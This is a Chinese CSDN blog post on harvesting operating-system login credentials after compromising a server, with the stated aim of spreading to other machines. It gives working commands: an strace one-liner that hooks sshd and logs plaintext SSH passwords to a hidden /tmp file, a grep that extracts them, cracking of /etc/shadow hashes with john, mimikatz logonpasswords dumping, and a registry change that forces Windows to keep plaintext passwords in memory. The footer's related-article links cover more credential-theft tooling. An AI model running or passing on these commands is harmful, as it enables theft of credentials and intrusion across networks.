操作系统登录凭证获取

最新推荐文章于 2024-04-09 13:01:14 发布
最新推荐文章于 2024-04-09 13:01:14 发布
阅读量1k 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43835473/article/details/109107803
版权

最近看了一些关于获取操作系统登录凭证的文章,当我们通过渗透获取到一台服务器权限之后,为了扩大战果,我们可以总是会想办法通过收集各种密码凭证,曾经就遇到过有客户所有服务器都是统一的账号密码,被拿到一台服务器的账号密码后,其他服务器也都被轻松拿下。因此在此记录一些密码凭证的获取方法。

一、Linux登录凭证

测试环境:CentOS7

1.strace收集
strace是一个动态跟踪工具,堪比键盘记录器
(1)抓取进程sshd中的明文密码输入 /tmp/.sshd.log

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

(2)然后用正则来匹配用户密码,输出的日志为二进制文件,需要加-a参数

grep -aE 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

(3)然后就可以在输出结果中看到账号密码
在这里插入图片描述2.shadow文件破解
shadow文件用于存储 Linux 系统中用户的密码信息,密码域由三部分组成,即 $id $salt $encrypted,id=1表明是用MD5加密的、id=2是用Blowfish加密的、id=5是用 SHA-256加密的,id=6时,采用SHA512进行加密。我这测试环境为CentOS7,id=6,为SHA512加密,可以用john解密
在这里插入图片描述破解出testtest账号密码为123456,john可以破解一些简单的弱口令,我这还有root账号的密码较强,并未解密成功
在这里插入图片描述二、window登录凭证

测试环境:Windows server 2012 R2

1.mimiktaz

mimiktaz可以抓取在内存中的密码,使用方法很简单,两条命令
(1)首先获取调试权限 privilege::debug
在这里插入图片描述(2)读取密码,sekurlsa::logonpasswords
在这里插入图片描述(3)将NTLM中的密文进行解密
在这里插入图片描述
我这里没有抓取到administrator的明文密码,看别人文章后发现微软在win7之后就打了补丁kb2871997,通过禁用Wdigest Auth来强制系统内存不保存明文密码,需要修改注册表让Wdigest Auth保存明文密码
在powshell中输入命令:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

在这里插入图片描述

修改后需重启或注销用户才生效,然后重新用mimiktaz抓取
在这里插入图片描述成功

split_personality
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows 用户登录凭证管理
08-07
Window 10 用户凭证 管理,用户凭证保存位置,如何更改密码?更改登录域?
凭证管理系统(凭证管理系统)
02-04
凭证管理系统 Left = 12 Top = 47 Width = 422 Height = 120 DataSource = DataSource1 ImeName = #20013#25991' ('#31616#20307') - '#20840#25340 Options = [dgTitles, dgIndicator, dgColumnResize, dgColLines, dgRowLines, dgTabs, dgRowSelect, dgConfirmDelete, dgCancelOnExit] ReadOnly = True TabOrder = 1 TitleFont.Charset = DEFAULT_CHARSET TitleFont.Color = clBlue TitleFont.Height = -11 TitleFont.Name = 'MS Sans Serif' TitleFont.Style = []
WCE Windows hash抓取工具 教程
Polemo的博客
03-09 7083
WCE 下载地址:链接:https://share.weiyun.com/5MqXW47 密码:bdpqku 工具界面
凭证获取:Linux凭证获取
qq_68163788的博客
02-15 1206
在Linux系统中,凭证获取是指获取和管理用户身份验证信息的过程。凭证通常包括用户名和密码,用于验证用户的身份并授予特定的权限。 在Linux系统中,有几种常见的凭证获取方式。最常见的是通过输入用户名和密码进行身份验证。用户可以通过登录界面或命令行提示输入凭证来验证其身份。另一种方式是使用SSH密钥对进行远程身份验证。用户可以生成公钥和私钥,将公钥放置在远程服务器上,然后使用私钥进行身份验证。
Linux获取登录凭证总结
weixin_44747030的博客
02-20 5891
Linux下获取凭证总结 前言 文章仅做学习交流 在内网渗透中,有时往往只需要一个凭证,撕开一个口子,慢慢的就能打通整个内网,下面会介绍在内网中碰到linux机器如何获取凭证的方法。 history记录 linux的history命令的作用是,记录执行过的命令。 这里可以看到当前在使用的shell是zsh,而在每个用户下都会生成一个文件.shell名_history的文件(如.zsh_history),在关闭终端后才会输入到该文件。 输入history查看执行过的命令 而在这里面可以分析到管理员会在这台
完整版系统登录模块.rar
04-03
系统会检查输入的凭证是否匹配数据库中存储的信息。为了安全起见,密码通常以哈希形式存储,而不是明文。哈希算法如MD5、SHA-1或更安全的SHA-256等,可以将密码转化为不可逆的固定长度字符串。 2. **验证码技术**:...
PHP实现简易用户登录系统
10-15
变量$servername、$username、$password和$dbname用于存储数据库服务器的信息和数据库登录凭证。 3. 数据库操作:在注册处理脚本reg.php中,我们使用了INSERT INTO语句向数据库中添加新用户,使用SELECT语句检查...
用WMI获取操作系统补丁信息
06-29
本文将深入探讨如何利用C++通过WMI获取操作系统的补丁(hotfix)信息,同时介绍虚拟接口技术在MFC DLL中的应用。 首先,WMI是微软提出的一种基于WBEM(Web-Based Enterprise Management)标准的组件,它为管理系统...
PHP-syetem.rar_用户系统_登录 php
09-22
登录过程涉及身份验证,确保输入的凭证与数据库中存储的匹配。 3. 用户信息管理:用户可以查看、更新或删除自己的个人信息,如修改密码、绑定邮箱、设置头像等。 4. 权限控制:根据用户的角色或等级,系统分配不同...
获取当前系统用户登录密码
11-17
在IT领域,安全性和隐私...总之,获取Windows用户的登录密码涉及到深入理解操作系统安全机制,调用底层API,以及遵循严格的权限和隐私政策。在实际应用中,更推荐使用标准的身份验证流程,以确保系统的安全性和合规性。
Windows下登录凭证窃取技巧
10-09 4万+
拿到一台Windows服务器权限,收集各种登录凭证以便扩大战果。本篇分享几个窃取Windows登录凭证的技巧和工具。 1、Windows 本地密码Hash Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系统下hash密码格式用户名称:RID:LM-HASH值:NT-HASH值。 例如: Admin...
查看Windows凭据和普通凭据的密码(查看Windows中存储的密码)——mimikatz
热门推荐
一碗单炒饭的专栏
02-10 6万+
使用mimikatz进行Windows中存储的密码查看 查看Windows为你管理的凭据 路径:控制面板\所有控制面板项\凭据管理器 软件下载 https://github.com/gentilkiwi/mimikatz/releases 下载完成后,以管理员方式运行mimikatz 查看Windows凭据 输入下方两个指令(#号后面的) mimikatz # privilege::debug...
内网渗透系列之mimikatz的使用以及后门植入
lza20001103的博客
09-04 4341
内网渗透系列之mimikatz的使用以及后门植入 文章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
登录凭证的方式
weixin_33691817的博客
09-11 955
目前登录凭证的方式无非两种: 一个是通过服务器端的session,一个是通过浏览器的cookie. 简而言之:session和cookie 常规的是通过session 步骤: 1,用户在浏览器登录 2,后台鉴权,若登录成功,则把用户信息写入session,servlet自动生成JSESSIONID 返回浏览器; 3,浏览器...
登录凭证------
kjl536566的博客
03-10 647
为什么需要登录凭证?web开发中,我们使用的协议http是无状态协议,http每次请求都是一个单独的请求,和之前的请求没有关系,服务器就不知道上一步你做了什么操作,我们需要一个办法证明我没登录过。
内网渗透-windows获取(本地、域、Ntds.dit)登录凭证实战手法总结(超详细)
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-03 1857
获取一台域内主机权限时,接下来的渗透思路就是要获取更高权限的账号,用来访问域控或横向拓展,那么在获取本地用户、域用户凭证获取域控Ntds.dit这一块就极其重要,将详细介绍红队渗透中使用获取登录凭证的手法。
登录凭证------_登录凭证是什么(1),网络安全开发基础学习
最新发布
2401_84139192的博客
04-09 823
在这个过程中,确保数据传输的安全性是非常重要的。通常,用户名和密码的传输会使用HTTPS等加密协议进行保护,以防止信息泄露。同时,对于登录凭证的存储和使用,也需要采取适当的安全措施,以防止被恶意利用。请注意,具体的实现方式会根据你使用的技术栈和框架有所不同。例如,如果你使用的是Spring Security等安全框架,它通常会提供一套完整的用户认证和授权机制,包括登录凭证的生成和管理。在实际开发中,建议参考你所使用的技术栈和框架的官方文档或相关教程,以获取更具体和详细的指导。
cookie之登录用户凭证
weixin_33805992的博客
02-18 1901
简述 说到cookie,我想前端开发都有听说过吧,cookie的本质就是用来存储数据的,但不能存太多数据。 cookie大多数是用来辨别用户身份的,但不止这一种用途,这就要看具体项目了。 今天我们要说的就是怎么通过cookie,能让服务器知道你就是某用户。 大家都知道http是无状态的,每次请求都是独立的,是没办法直接判断某个请求是否是同一个用户发起, 这时候cookie就起作用的,当用户第一次登...
内网渗透中mimikatz的使用
pyphrb的博客
07-28 4万+
0x01 简介mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单0x02 测试环境网络资源管理模式:域 已有资源:域内一台主机权限 操作系统:win7 x64 域权限:普通用户0x03 测试目标1、获得域控权限 2、导出所有用户口令 3、维持域控权限0x04 测试过程1、获取本机信息mimikatz:privilege::debug sekurlsa::logonpas
UNIX操作系统服务详解与登录过程
首先,书中提到了操作系统的基本作用,即为运行在其上的程序提供服务,如执行程序、管理文件、内存分配和获取系统时间等。在UNIX系统中,这些服务的实现具有独特的特性和接口,是学习UNIX编程的基础。 "登录"是进入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值